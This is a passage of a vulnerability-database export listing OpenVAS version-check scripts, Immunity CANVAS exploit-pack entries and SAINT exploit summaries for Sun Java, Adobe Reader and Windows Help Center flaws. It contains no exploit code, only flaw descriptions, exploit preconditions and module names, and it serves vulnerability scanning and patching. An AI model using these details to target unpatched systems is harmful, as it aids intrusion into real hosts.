}\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-13T12:48:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "description": "This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:902167", "href": "http://plugins.openvas.org/nasl.php?oid=902167", "type": "openvas", "title": "Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_sun_java_jdk_mult_vuln_win_apr10.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Upgrade to Sun Java version 6 Update 20,\n For updates refer to http://java.sun.com/javase/6/\n\n Workaround:\n Set the killbit for the CLSID {CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}\n http://support.microsoft.com/kb/240797\";\n\ntag_impact = \"Successful exploitation allows execution of arbitrary code by tricking a user\n into visiting a malicious web page.\n Impact Level: Application\";\ntag_affected = \"Sun Java version 6 Update 19 and prior on Windows.\";\ntag_insight = \"The flaws are due to input validation error in 'JDk' that does not properly\n validate arguments supplied via 'javaw.exe' before being passed to a\n 'CreateProcessA' call, which could allow remote attackers to automatially\n download and execute a malicious JAR file hosted on a network.\";\ntag_summary = \"This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902167);\n script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 17:57:39 +0200 (Fri, 23 Apr 2010)\");\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39492);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\");\n\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 
SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JDK/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/886582\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0853\");\n script_xref(name : \"URL\" , value : \"http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html\");\n script_xref(name : \"URL\" , value : \"http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\n\n## Get KB for JDK Version On Windows\njdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\nif(jdkVer)\n{\n ## Check for 1.6 < 1.6.0_19 (6 Update 19)\n if(version_in_range(version:jdkVer, test_version:\"1.6\", test_version2:\"1.6.0.19\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-27T19:23:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "description": "This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:1361412562310902167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902167", "type": "openvas", "title": "Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java Deployment Toolkit Multiple 
Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902167\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 17:57:39 +0200 (Fri, 23 Apr 2010)\");\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39492);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK/Win/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows execution of arbitrary code by tricking a user\n into visiting a malicious web page.\");\n\n 
script_tag(name:\"affected\", value:\"Sun Java version 6 Update 19 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to input validation error in 'JDk' that does not properly\n validate arguments supplied via 'javaw.exe' before being passed to a\n 'CreateProcessA' call, which could allow remote attackers to automatically\n download and execute a malicious JAR file hosted on a network.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Sun Java version 6 Update 20.\n\n Workaround:\n Set the killbit for the CLSID {CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/886582\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0853\");\n script_xref(name:\"URL\", value:\"http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html\");\n script_xref(name:\"URL\", value:\"http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/240797\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\n\njdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\nif(jdkVer)\n{\n if(version_in_range(version:jdkVer, test_version:\"1.6\", test_version2:\"1.6.0.19\")){\n report = report_fixed_ver(installed_version:jdkVer, vulnerable_range:\"1.6 - 1.6.0.19\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-26T08:55:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", 
"CVE-2009-1061"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.", "modified": "2017-07-11T00:00:00", "published": "2009-03-31T00:00:00", "id": "OPENVAS:63686", "href": "http://plugins.openvas.org/nasl.php?oid=63686", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:014 (acroread)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_014.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:014 (acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\nPlease find more details at Adobe's site:\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\n\nNote that Adobe did not provide updates for Adobe Reader 7 as used\non NLD9. 
We cannot upgrade to newer versions due to library\ndependencies. We strongly encourage users of acroread on NLD9 to\nuninstall the package and to use an alternative, open source pdf\nviewer instead. We're currently evaluating the possibility of\ndisabling acroread on NLD9 via online update.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:014\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.\";\n\n \n\nif(description)\n{\n script_id(63686);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:014 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200904-17.", "modified": "2017-07-07T00:00:00", "published": "2009-04-20T00:00:00", "id": "OPENVAS:63853", "href": "http://plugins.openvas.org/nasl.php?oid=63853", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200904-17 (acroread)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Reader is vulnerable to execution of arbitrary code.\";\ntag_solution = \"All Adobe Reader users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200904-17\nhttp://bugs.gentoo.org/show_bug.cgi?id=259992\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200904-17.\";\n\n \n \n\nif(description)\n{\n script_id(63853);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200904-17 (acroread)\");\n\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 8.1.4\"), vulnerable: make_list(\"lt 8.1.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "description": "**Name**| ie_hcp \n---|--- \n**CVE**| CVE-2010-1885 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ie_hcp \n**Notes**| CVE Name: CVE-2010-1885 \nVENDOR: Microsoft \nNotes: http://www.microsoft.com/technet/security/Bulletin/MS10-042.mspx \nRepeatability: Infinite \nMSADV: MS10-042 \nDate public: 06/09/2010 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885 \nCVSS: 9.3 \n\n", "edition": 2, "modified": "2010-06-15T14:04:00", "published": "2010-06-15T14:04:00", "id": "IE_HCP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ie_hcp", "type": "canvas", "title": "Immunity Canvas: IE_HCP", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:23", "bulletinFamily": 
"exploit", "cvelist": ["CVE-2009-0927"], "description": "**Name**| acrobat_js4 \n---|--- \n**CVE**| CVE-2009-0927 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| acrobat_js4 \n**Notes**| CVE Name: CVE-2009-0927 \nVersionsAffected: Acrobat Reader <=8.1.2 and <=9.0 \nRepeatability: \nReferences: http://www.adobe.com/support/security/bulletins/apsb09-04.html \nDate public: 03/24/2009 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927 \n\n", "edition": 2, "modified": "2009-03-19T10:30:00", "published": "2009-03-19T10:30:00", "id": "ACROBAT_JS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_js4", "type": "canvas", "title": "Immunity Canvas: ACROBAT_JS4", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "description": "**Name**| ms06_014 \n---|--- \n**CVE**| CVE-2006-0003 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| RDS Datastore (MS06-014) \n**Notes**| CVE Name: CVE-2006-0003 \nVENDOR: Microsoft \nMSADV: MS06-014 \nRepeatability: Infinite (client side - no crash) \nMSRC: http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVS-2006-0003 \nDate public: 4/11/2006 \nCVSS: 5.1 \n\n", "edition": 2, "modified": "2006-04-12T00:02:00", "published": "2006-04-12T00:02:00", "id": "MS06_014", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_014", "type": "canvas", "title": "Immunity Canvas: MS06_014", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "description": "Added: 06/15/2010 \nCVE: [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>) \nBID: 
[40725](<http://www.securityfocus.com/bid/40725>) \nOSVDB: [65264](<http://www.osvdb.org/65264>) \n\n\n### Background\n\nThe [Microsoft Windows Help and Support Center](<http://technet.microsoft.com/en-us/library/bb457022.aspx>) is a resource in Microsoft Windows operating systems for online help, support, tools, how-to articles, and other resources. \n\n### Problem\n\nA vulnerability in Windows Help and Support Center allows command execution when a user loads a specially crafted HCP URL resulting in a bypass of the whitelist restrictions provided by the `**-FromHCP**` option. \n\n### Resolution\n\nApply the fix referenced in [Microsoft Security Bulletin 10-042](<http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/578319> \n<http://www.securityfocus.com/archive/1/511774> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 and requires a user to open the exploit page in Internet Explorer. \n\nInternet Explorer 8 will pop up security prompts during the exploiting process asking permissions for execution operations. The target user must grant these operations. \n\nExploit requires the ability to bind to port 69/UDP on the SAINTexploit host. 
\n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "SAINT:500F83833D8CE812FA9B6A3B0F45786C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_helpctr_fromhcp_whitelist_bypass", "title": "Windows Help and Support Center -FromHCP URL whitelist bypass", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "edition": 2, "description": "Added: 06/15/2010 \nCVE: [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>) \nBID: [40725](<http://www.securityfocus.com/bid/40725>) \nOSVDB: [65264](<http://www.osvdb.org/65264>) \n\n\n### Background\n\nThe [Microsoft Windows Help and Support Center](<http://technet.microsoft.com/en-us/library/bb457022.aspx>) is a resource in Microsoft Windows operating systems for online help, support, tools, how-to articles, and other resources. \n\n### Problem\n\nA vulnerability in Windows Help and Support Center allows command execution when a user loads a specially crafted HCP URL resulting in a bypass of the whitelist restrictions provided by the `**-FromHCP**` option. \n\n### Resolution\n\nApply the fix referenced in [Microsoft Security Bulletin 10-042](<http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/578319> \n<http://www.securityfocus.com/archive/1/511774> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 and requires a user to open the exploit page in Internet Explorer. \n\nInternet Explorer 8 will pop up security prompts during the exploiting process asking permissions for execution operations. The target user must grant these operations. \n\nExploit requires the ability to bind to port 69/UDP on the SAINTexploit host. 
\n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_helpctr_fromhcp_whitelist_bypass", "id": "SAINT:3B46CFB2D4C3EBFC228A16FC6CC49E11", "type": "saint", "title": "Windows Help and Support Center -FromHCP URL whitelist bypass", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "description": "Added: 06/15/2010 \nCVE: [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>) \nBID: [40725](<http://www.securityfocus.com/bid/40725>) \nOSVDB: [65264](<http://www.osvdb.org/65264>) \n\n\n### Background\n\nThe [Microsoft Windows Help and Support Center](<http://technet.microsoft.com/en-us/library/bb457022.aspx>) is a resource in Microsoft Windows operating systems for online help, support, tools, how-to articles, and other resources. \n\n### Problem\n\nA vulnerability in Windows Help and Support Center allows command execution when a user loads a specially crafted HCP URL resulting in a bypass of the whitelist restrictions provided by the `**-FromHCP**` option. \n\n### Resolution\n\nApply the fix referenced in [Microsoft Security Bulletin 10-042](<http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/578319> \n<http://www.securityfocus.com/archive/1/511774> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 and requires a user to open the exploit page in Internet Explorer. \n\nInternet Explorer 8 will pop up security prompts during the exploiting process asking permissions for execution operations. The target user must grant these operations. \n\nExploit requires the ability to bind to port 69/UDP on the SAINTexploit host. 
\n\n### Platforms\n\nWindows XP \n \n\n", "edition": 1, "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "SAINT:F159D63C4ABD84C60A4DEC50BD8A348D", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_helpctr_fromhcp_whitelist_bypass", "type": "saint", "title": "Windows Help and Support Center -FromHCP URL whitelist bypass", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. 
\n\n### Platforms\n\nWindows XP \n \n\n", "edition": 1, "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "id": "SAINT:AFE3E3BE3BB3652683F3F01263CCE593", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "edition": 2, "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. 
\n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "id": "SAINT:654B00AF52A01A1D29119E4E92043279", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. 
